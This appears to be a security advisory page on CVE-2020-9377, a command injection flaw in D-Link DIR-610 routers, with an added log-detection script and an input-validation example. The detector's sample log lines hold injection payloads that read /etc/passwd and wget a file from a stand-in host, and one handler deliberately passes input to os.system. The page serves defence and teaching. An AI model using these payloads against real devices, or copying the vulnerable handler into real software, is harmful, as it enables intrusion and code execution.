Cyber Resilience

CVE-2020-9377

Severity: High
Tags: CISA KEV · Active Exploitation · EUVD Exploited · Public PoC · RCE

Published: 09 July 2020
Modified: 10 November 2025
KEV Added: 25 March 2022
Patch: none (product is end-of-life; see vendor advisory below)
CVSS v3.1: 8.8 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)
EPSS: 0.7664 (99.0th percentile)
Risk Priority: 84 (60% EPSS · 20% KEV · 20% CVSS)

Summary

CVE-2020-9377 is a high-severity OS command injection (CWE-78) vulnerability in D-Link DIR-610 router firmware. Its CVSS v3.1 base score is 8.8 (High).

Operationally, it ranks in the top 1.0% of CVEs by exploit likelihood (EPSS 0.7664); CISA has added it to the Known Exploited Vulnerabilities catalog; and a public proof-of-concept is referenced.

The strongest mitigations our analysis identified are NIST 800-53 SA-22 (Unsupported System Components), because the product is end-of-life and will never receive a fix, and SI-10 (Information Input Validation).

Deeper analysis

D-Link DIR-610 wireless routers contain an OS command injection vulnerability, identified as CVE-2020-9377 and assigned CWE-78. The flaw exists in the command.php script, which accepts an unsanitized cmd parameter that is passed directly to the underlying operating system. The vulnerability affects only devices that are no longer supported by the vendor.

An attacker with network access to the device's web interface and a valid low-privileged account (PR:L in the vector) can send crafted HTTP requests that place arbitrary shell commands in the cmd parameter. The CVSS vector records a network attack vector, low attack complexity and no user interaction; successful exploitation yields arbitrary command execution on the device, with high impact to confidentiality, integrity, and availability.

D-Link security advisory SAP10182 states that the DIR-610 has reached end-of-life and will receive no patches or ongoing support. The vendor directs users to the product page, which confirms the unsupported status, and recommends replacing the device.

The published proof-of-concept on GitHub demonstrates direct remote command execution against exposed devices.
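Because no patch will ever ship, the practical response for defenders who still find a DIR-610 on the network is to detect attempts against it while it is being replaced or isolated. The following is an added example, not code from this page, from D-Link or from the referenced proof-of-concept. It applies the one fact the advisory gives (the cmd parameter of command.php is handed to the operating system) to Combined Log Format access-log lines, and it generalises slightly: any request to command.php carrying cmd is treated as an attempt, and the value is additionally checked for shell metacharacters that chain further commands. The log lines are constructed; the assumption is that the logs come from a reverse proxy, WAF or IDS in front of the device, since the router itself offers no useful logging.

```python
"""Find CVE-2020-9377 exploitation attempts in web access logs.

Added example, not code from the page, from D-Link or from the public PoC.
Any request to command.php that carries a `cmd` parameter is flagged; the
decoded value is also checked for POSIX shell metacharacters. The log lines
below are constructed. Realistic log source: a reverse proxy, WAF or IDS in
front of the end-of-life router (assumption).
"""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Combined Log Format: host ident user [time] "METHOD target HTTP/x" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# Characters that chain, substitute or redirect commands in a POSIX shell.
SHELL_META = re.compile(r'[;&|`$(){}<>\n]')

# Constructed sample: line 1 is benign; lines 2-5 target command.php.
SAMPLE_LOG = [
    '198.51.100.9 - - [12/Jul/2020:10:14:58 +0000] "GET /index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '198.51.100.23 - - [12/Jul/2020:10:15:01 +0000] "GET /command.php?cmd=cat%20/etc/passwd HTTP/1.1" 200 512 "-" "curl/7.68.0"',
    '198.51.100.23 - - [12/Jul/2020:10:15:04 +0000] "GET /command.php?cmd=id%3Bwget%20http%3A%2F%2F198.51.100.7%2Fx%20-O%20%2Ftmp%2Fx HTTP/1.1" 200 64 "-" "curl/7.68.0"',
    '203.0.113.5 - - [12/Jul/2020:10:16:30 +0000] "GET /cgi/command.php?cmd=id%253Bid HTTP/1.1" 200 40 "-" "python-requests/2.23"',
    '203.0.113.5 - - [12/Jul/2020:10:16:31 +0000] "POST /command.php HTTP/1.1" 200 40 "-" "python-requests/2.23"',
]


def inspect_target(target):
    """Return a finding for a request target aimed at command.php, else None.

    The finding holds the decoded cmd value (None when the parameter is not
    visible, e.g. it travelled in a POST body) and whether it contains shell
    metacharacters that chain additional commands.
    """
    parts = urlsplit(target)
    if not parts.path.lower().endswith("/command.php"):
        return None
    query = parse_qs(parts.query, keep_blank_values=True)
    cmd = None
    for value in query.get("cmd", []):
        # parse_qs decoded one layer; a second unquote catches %253B-style
        # double encoding used to slip past naive filters.
        cmd = unquote(value)
        break
    return {"cmd": cmd, "chained": bool(cmd and SHELL_META.search(cmd))}


def analyze(lines):
    """Parse access-log lines and return findings for command.php requests."""
    findings = []
    for line in lines:
        match = LOG_RE.match(line)
        if match is None:
            continue  # not Combined Log Format; skip rather than guess
        finding = inspect_target(match["target"])
        if finding is None:
            continue
        finding.update(
            ip=match["ip"],
            time=match["time"],
            method=match["method"],
            status=int(match["status"]),
        )
        findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_LOG):
        tag = "CHAINED" if f["chained"] else ("cmd" if f["cmd"] else "no-query")
        print(f'{f["time"]} {f["ip"]} {f["method"]} status={f["status"]} [{tag}] {f["cmd"]!r}')
```

To run it against a real file, pass the file object to analyze (for example `analyze(open("/var/log/nginx/access.log"))`). A POST to command.php is reported even though the parameter is not visible in the access log, because the endpoint has no legitimate use that a defender should tolerate on an exposed device.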

Vulnerability details

D-Link DIR-610 devices allow Remote Command Execution via the cmd parameter to command.php. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.

CWE(s): CWE-78 (OS Command Injection)

Related Threats

No named actor attribution yet. ATT&CK technique mapping in progress for this CVE.

Affected Assets

D-Link DIR-610 firmware, all versions

Mitigating Controls

Mitigating Controls (NIST 800-53 r5)

SA-22 Unsupported System Components (prevent): directly requires replacement or isolation of the unsupported DIR-610, which will receive no patch for the command.php flaw.

SI-10 Information Input Validation (prevent): mandates validation and sanitization of the cmd parameter, whose lack of sanitization is what enables OS command injection.

SC-7 Boundary Protection (prevent): enforces boundary protection to block network access to the vulnerable command.php endpoint on exposed routers.
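For operators who run their own web-managed devices, SI-10 is the control that would have prevented this class of bug. The following is an added example, not D-Link's code: command.php is a PHP script whose source is not on this page, so the vulnerable handler below only mirrors the anti-pattern the advisory describes (the client's string is the command). The hardened handler shows what the control requires in practice: an allowlist of actions, a typed check of the single argument each action takes, and an argv list executed without a shell so that no input is ever parsed as shell syntax. The action names (ping, traceroute) and argument shapes are assumptions about what such a diagnostic endpoint legitimately does.

```python
"""Input validation for a router diagnostic endpoint (NIST 800-53 SI-10).

Added example, not D-Link's code. handle_vulnerable mirrors the CWE-78
anti-pattern described for command.php; handle_hardened replaces it with an
allowlist of actions, typed argument validation and a shell-free argv list.
The actions and argument shapes are assumptions.
"""
import ipaddress
import os
import re
import subprocess

# RFC 1123 hostname: labels of letters, digits and hyphens that neither start
# nor end with a hyphen. This also excludes values beginning with "-" that a
# program would otherwise interpret as an option.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$"
)


def handle_vulnerable(params):
    """CWE-78 as described for command.php: params["cmd"] IS the shell command."""
    return os.system(params["cmd"])  # never do this; shown for contrast only


def validate_host(value):
    """Accept an IP literal or a hostname; raise ValueError for anything else."""
    try:
        return str(ipaddress.ip_address(value))
    except ValueError:
        pass
    if HOSTNAME_RE.match(value):
        return value
    raise ValueError(f"invalid host: {value!r}")


# Allowlist: the client names an action; the server owns the program and flags.
ACTIONS = {
    "ping": lambda host: ["ping", "-c", "4", validate_host(host)],
    "traceroute": lambda host: ["traceroute", "-m", "15", validate_host(host)],
}


def build_argv(params):
    """Map validated request parameters to an argv list, or raise ValueError."""
    action = params.get("action")
    if action not in ACTIONS:
        raise ValueError(f"unknown action: {action!r}")
    return ACTIONS[action](params.get("host", ""))


def handle_hardened(params):
    """Run the allowlisted action with no shell involved; return its stdout."""
    argv = build_argv(params)
    result = subprocess.run(argv, capture_output=True, text=True, timeout=30)
    return result.stdout


if __name__ == "__main__":
    print(build_argv({"action": "ping", "host": "192.0.2.1"}))
    for bad in ({"action": "ping", "host": "192.0.2.1;id"}, {"action": "reboot"}):
        try:
            build_argv(bad)
        except ValueError as exc:
            print("rejected:", exc)
```

The essential difference is not the hostname regex but the shape of the call: build_argv never produces a string for a shell to re-parse, so even a validation bypass would reach ping or traceroute as a single argument rather than as a new command.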
